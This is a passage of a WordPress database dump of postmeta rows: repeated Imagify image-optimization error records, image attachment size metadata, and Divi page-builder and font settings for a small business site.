continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1684,301,'_imagify_optimization_level','2'),(1685,301,'_imagify_status','error'),(1686,301,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1687,300,'_imagify_optimization_level','2'),(1688,300,'_imagify_status','error'),(1689,300,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1690,299,'_imagify_optimization_level','2'),(1691,299,'_imagify_status','error'),(1692,299,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1693,298,'_imagify_optimization_level','2'),(1694,298,'_imagify_status','error'),(1695,298,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1696,296,'_imagify_optimization_level','2'),(1697,296,'_imagify_status','error'),(1698,296,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1699,281,'_imagify_optimization_level','2'),(1700,281,'_imagify_status','error'),(1701,281,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1702,280,'_imagify_optimization_level','2'),(1703,280,'_imagify_status','error'),(1704,280,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1705,257,'_imagify_optimization_level','2'),(1706,257,'_imagify_status','error'),(1707,257,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1708,254,'_imagify_optimization_level','2'),(1709,254,'_imagify_status','error'),(1710,254,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1711,250,'_imagify_optimization_level','2'),(1712,250,'_imagify_status','error'),(1713,250,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1714,247,'_imagify_optimization_level','2'),(1715,247,'_imagify_status','error'),(1716,247,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1717,243,'_imagify_optimization_level','2'),(1718,243,'_imagify_status','error'),(1719,243,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1720,240,'_imagify_optimization_level','2'),(1721,240,'_imagify_status','error'),(1722,240,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1818,469,'_wp_attachment_metadata','a:8:{s:5:\"width\";i:2560;s:6:\"height\";i:1297;s:4:\"file\";s:60:\"2023/03/Justin-Confrence-Room-2-Black-White-Muted-scaled.jpg\";s:8:\"filesize\";i:208748;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:53:\"Justin-Confrence-Room-2-Black-White-Muted-300x152.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17759;}s:5:\"large\";a:5:{s:4:\"file\";s:54:\"Justin-Confrence-Room-2-Black-White-Muted-1024x519.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:519;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56195;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:53:\"Justin-Confrence-Room-2-Black-White-Muted-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14591;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:53:\"Justin-Confrence-Room-2-Black-White-Muted-768x389.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:389;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39807;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:54:\"Justin-Confrence-Room-2-Black-White-Muted-1536x778.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:778;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97908;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:55:\"Justin-Confrence-Room-2-Black-White-Muted-2048x1038.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1038;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:148795;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:53:\"Justin-Confrence-Room-2-Black-White-Muted-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22979;}s:31:\"et-pb-post-main-image-fullwidth\";a:5:{s:4:\"file\";s:54:\"Justin-Confrence-Room-2-Black-White-Muted-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67793;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:53:\"Justin-Confrence-Room-2-Black-White-Muted-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23597;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:53:\"Justin-Confrence-Room-2-Black-White-Muted-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29606;}s:28:\"et-pb-portfolio-image-single\";a:5:{s:4:\"file\";s:54:\"Justin-Confrence-Room-2-Black-White-Muted-1080x547.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:547;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60277;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:53:\"Justin-Confrence-Room-2-Black-White-Muted-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27352;}s:37:\"et-pb-post-main-image-fullwidth-large\";a:5:{s:4:\"file\";s:55:\"Justin-Confrence-Room-2-Black-White-Muted-2880x1800.jpg\";s:5:\"width\";i:2880;s:6:\"height\";i:1800;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:277065;}s:32:\"et-pb-image--responsive--desktop\";a:5:{s:4:\"file\";s:54:\"Justin-Confrence-Room-2-Black-White-Muted-1280x649.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:649;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76075;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:53:\"Justin-Confrence-Room-2-Black-White-Muted-980x497.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:497;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53446;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:53:\"Justin-Confrence-Room-2-Black-White-Muted-480x243.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:243;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24736;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:45:\"Justin-Confrence-Room-2-Black-White-Muted.jpg\";s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"79\";s:8:\"quantity\";d:82;s:4:\"webp\";i:0;}}'),(1729,223,'_imagify_optimization_level','2'),(1730,223,'_imagify_status','error'),(1731,223,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1735,221,'_imagify_optimization_level','2'),(1736,221,'_imagify_status','error'),(1737,221,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1741,219,'_imagify_optimization_level','2'),(1742,219,'_imagify_status','error'),(1743,219,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1744,218,'_imagify_optimization_level','2'),(1745,218,'_imagify_status','error'),(1746,218,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1747,217,'_imagify_optimization_level','2'),(1748,217,'_imagify_status','error'),(1749,217,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1750,216,'_imagify_optimization_level','2'),(1751,216,'_imagify_status','error'),(1752,216,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1756,198,'_imagify_optimization_level','2'),(1757,198,'_imagify_status','error'),(1758,198,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(2166,38,'_et_builder_dynamic_assets_loading_attr_threshold','5'),(2191,3,'_et_pb_show_page_creation','off'),(1780,81,'_imagify_optimization_level','2'),(1781,81,'_imagify_status','error'),(1782,81,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1783,78,'_imagify_optimization_level','2'),(1784,78,'_imagify_status','error'),(1785,78,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1786,75,'_imagify_optimization_level','2'),(1787,75,'_imagify_status','error'),(1788,75,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1789,72,'_imagify_optimization_level','2'),(1790,72,'_imagify_status','error'),(1791,72,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1792,69,'_imagify_optimization_level','2'),(1793,69,'_imagify_status','error'),(1794,69,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1795,66,'_imagify_optimization_level','2'),(1796,66,'_imagify_status','error'),(1797,66,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1798,62,'_imagify_optimization_level','2'),(1799,62,'_imagify_status','error'),(1800,62,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1801,58,'_imagify_optimization_level','2'),(1802,58,'_imagify_status','error'),(1803,58,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1804,55,'_imagify_optimization_level','2'),(1805,55,'_imagify_status','error'),(1806,55,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1852,484,'_wp_trash_meta_status','publish'),(1853,484,'_wp_trash_meta_time','1679589671'),(1981,526,'_et_autogenerated_title','0'),(1982,526,'_et_default','1'),(1983,526,'_et_enabled','1'),(1984,526,'_et_header_layout_id','0'),(1985,526,'_et_header_layout_enabled','1'),(1986,526,'_et_body_layout_id','0'),(1987,526,'_et_body_layout_enabled','1'),(1988,526,'_et_footer_layout_id','523'),(1989,526,'_et_footer_layout_enabled','1'),(1990,525,'_et_template','526'),(2101,71,'_et_builder_dynamic_assets_loading_attr_threshold','3'),(2054,549,'_wp_trash_meta_status','publish'),(2055,549,'_wp_trash_meta_time','1680008696'),(2586,702,'_thumbnail_id','0'),(3174,311,'_et_builder_dynamic_assets_loading_attr_threshold','4'),(3175,311,'_et_dynamic_cached_attributes','a:0:{}'),(3176,311,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:1:{s:15:\"et-gf-open-sans\";s:94:\"Open+Sans:300,regular,500,600,700,800,300italic,italic,500italic,600italic,700italic,800italic\";}s:6:\"subset\";a:8:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:6:\"hebrew\";i:5;s:5:\"latin\";i:6;s:9:\"latin-ext\";i:7;s:10:\"vietnamese\";}s:9:\"cache_key\";s:69:\"{\"gph\":0,\"divi\":\"4.20.4\",\"wp\":\"6.2\",\"enable_all_character_sets\":\"on\"}\";}'),(2877,819,'_et_pb_post_hide_nav','default'),(2048,57,'_et_builder_dynamic_assets_loading_attr_threshold','2'),(2092,384,'_wp_old_date','2023-03-19'),(2061,225,'_et_builder_dynamic_assets_loading_attr_threshold','4'),(2067,80,'_et_builder_dynamic_assets_loading_attr_threshold','4'),(2884,819,'_et_pb_old_content','<!-- wp:gravityforms/form {\"formId\":\"5\"} /-->'),(2893,819,'_et_pb_enable_shortcode_tracking',''),(2894,819,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"819\" /]'),(2069,68,'_et_builder_dynamic_assets_loading_attr_threshold','3'),(3139,615,'_et_dynamic_cached_attributes','a:1:{s:9:\"fullwidth\";a:1:{i:0;s:3:\"off\";}}'),(3140,615,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:1:{s:15:\"et-gf-open-sans\";s:94:\"Open+Sans:300,regular,500,600,700,800,300italic,italic,500italic,600italic,700italic,800italic\";}s:6:\"subset\";a:8:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:6:\"hebrew\";i:5;s:5:\"latin\";i:6;s:9:\"latin-ext\";i:7;s:10:\"vietnamese\";}s:9:\"cache_key\";s:69:\"{\"gph\":0,\"divi\":\"4.20.4\",\"wp\":\"6.2\",\"enable_all_character_sets\":\"on\"}\";}'),(2130,564,'_wp_trash_meta_status','publish'),(2131,564,'_wp_trash_meta_time','1680358801'),(3178,819,'_et_dynamic_cached_shortcodes','a:7:{i:0;s:13:\"et_pb_section\";i:1;s:9:\"et_pb_row\";i:2;s:12:\"et_pb_column\";i:12;s:10:\"et_pb_code\";i:30;s:11:\"et_pb_image\";i:33;s:10:\"et_pb_menu\";i:49;s:10:\"et_pb_text\";}'),(3169,327,'_et_dynamic_cached_shortcodes','a:6:{i:0;s:13:\"et_pb_section\";i:1;s:9:\"et_pb_row\";i:2;s:12:\"et_pb_column\";i:30;s:11:\"et_pb_image\";i:33;s:10:\"et_pb_menu\";i:49;s:10:\"et_pb_text\";}'),(2174,26,'_et_pb_ab_subjects',''),(2175,26,'_et_pb_enable_shortcode_tracking',''),(2176,26,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"26\" /]'),(2177,26,'_et_pb_custom_css',''),(2178,26,'_et_pb_gutter_width','3'),(2180,26,'_global_colors_info','{}'),(2181,26,'_et_builder_version','VB|Divi|4.20.4'),(2199,3,'_thumbnail_id','0'),(2200,3,'_global_colors_info','{}'),(2201,3,'_et_builder_version','VB|Divi|4.20.2'),(2183,3,'_et_builder_dynamic_assets_loading_attr_threshold','4'),(2194,3,'_et_pb_ab_subjects',''),(2195,3,'_et_pb_enable_shortcode_tracking',''),(2196,3,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"3\" /]'),(2197,3,'_et_pb_custom_css',''),(2198,3,'_et_pb_gutter_width','3'),(2193,3,'_et_pb_built_for_post_type','page'),(2255,615,'_et_pb_custom_css',''),(2256,615,'_et_pb_gutter_width','3'),(2187,26,'_et_builder_dynamic_assets_loading_attr_threshold','4'),(3146,343,'_et_dynamic_cached_shortcodes','a:6:{i:0;s:13:\"et_pb_section\";i:1;s:9:\"et_pb_row\";i:2;s:12:\"et_pb_column\";i:30;s:11:\"et_pb_image\";i:33;s:10:\"et_pb_menu\";i:49;s:10:\"et_pb_text\";}'),(3147,343,'_et_builder_dynamic_assets_loading_attr_threshold','4'),(3148,343,'_et_dynamic_cached_attributes','a:0:{}'),(3149,343,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:1:{s:15:\"et-gf-open-sans\";s:94:\"Open+Sans:300,regular,500,600,700,800,300italic,italic,500italic,600italic,700italic,800italic\";}s:6:\"subset\";a:8:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:6:\"hebrew\";i:5;s:5:\"latin\";i:6;s:9:\"latin-ext\";i:7;s:10:\"vietnamese\";}s:9:\"cache_key\";s:69:\"{\"gph\":0,\"divi\":\"4.20.4\",\"wp\":\"6.2\",\"enable_all_character_sets\":\"on\"}\";}'),(2053,61,'_et_builder_dynamic_assets_loading_attr_threshold','3'),(2794,792,'_wp_attached_file','2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png'),(2795,792,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:5000;s:6:\"height\";i:5000;s:4:\"file\";s:51:\"2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\";s:8:\"filesize\";i:241039;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:51:\"Thumbs-Up-Icon-No-Background-Hex-666666-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8083;}s:5:\"large\";a:5:{s:4:\"file\";s:53:\"Thumbs-Up-Icon-No-Background-Hex-666666-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:31096;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:51:\"Thumbs-Up-Icon-No-Background-Hex-666666-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3904;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:51:\"Thumbs-Up-Icon-No-Background-Hex-666666-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:22703;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:53:\"Thumbs-Up-Icon-No-Background-Hex-666666-1536x1536.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:49327;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:53:\"Thumbs-Up-Icon-No-Background-Hex-666666-2048x2048.png\";s:5:\"width\";i:2048;s:6:\"height\";i:2048;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:68650;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:51:\"Thumbs-Up-Icon-No-Background-Hex-666666-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7566;}s:31:\"et-pb-post-main-image-fullwidth\";a:5:{s:4:\"file\";s:52:\"Thumbs-Up-Icon-No-Background-Hex-666666-1080x675.png\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:22676;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:51:\"Thumbs-Up-Icon-No-Background-Hex-666666-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8292;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:51:\"Thumbs-Up-Icon-No-Background-Hex-666666-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11279;}s:28:\"et-pb-portfolio-image-single\";a:5:{s:4:\"file\";s:53:\"Thumbs-Up-Icon-No-Background-Hex-666666-1080x1080.png\";s:5:\"width\";i:1080;s:6:\"height\";i:1080;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:32965;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:51:\"Thumbs-Up-Icon-No-Background-Hex-666666-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10836;}s:37:\"et-pb-post-main-image-fullwidth-large\";a:5:{s:4:\"file\";s:53:\"Thumbs-Up-Icon-No-Background-Hex-666666-2880x1800.png\";s:5:\"width\";i:2880;s:6:\"height\";i:1800;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:67638;}s:32:\"et-pb-image--responsive--desktop\";a:5:{s:4:\"file\";s:53:\"Thumbs-Up-Icon-No-Background-Hex-666666-1280x1280.png\";s:5:\"width\";i:1280;s:6:\"height\";i:1280;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:40064;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:51:\"Thumbs-Up-Icon-No-Background-Hex-666666-980x980.png\";s:5:\"width\";i:980;s:6:\"height\";i:980;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:29215;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:51:\"Thumbs-Up-Icon-No-Background-Hex-666666-480x480.png\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13408;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2172,592,'_et_pb_built_for_post_type','page'),(2173,26,'_et_pb_built_for_post_type','page'),(2855,816,'_edit_lock','1680984352:1'),(2856,816,'_edit_last','1'),(3207,242,'_et_builder_dynamic_assets_loading_attr_threshold','4'),(2858,819,'_edit_lock','1680984334:1'),(2859,819,'_edit_last','1'),(2860,819,'_wp_page_template','default'),(3165,318,'_et_dynamic_cached_shortcodes','a:6:{i:0;s:13:\"et_pb_section\";i:1;s:9:\"et_pb_row\";i:2;s:12:\"et_pb_column\";i:30;s:11:\"et_pb_image\";i:33;s:10:\"et_pb_menu\";i:49;s:10:\"et_pb_text\";}'),(3166,318,'_et_builder_dynamic_assets_loading_attr_threshold','4'),(3167,318,'_et_dynamic_cached_attributes','a:0:{}'),(3168,318,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:1:{s:15:\"et-gf-open-sans\";s:94:\"Open+Sans:300,regular,500,600,700,800,300italic,italic,500italic,600italic,700italic,800italic\";}s:6:\"subset\";a:8:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:6:\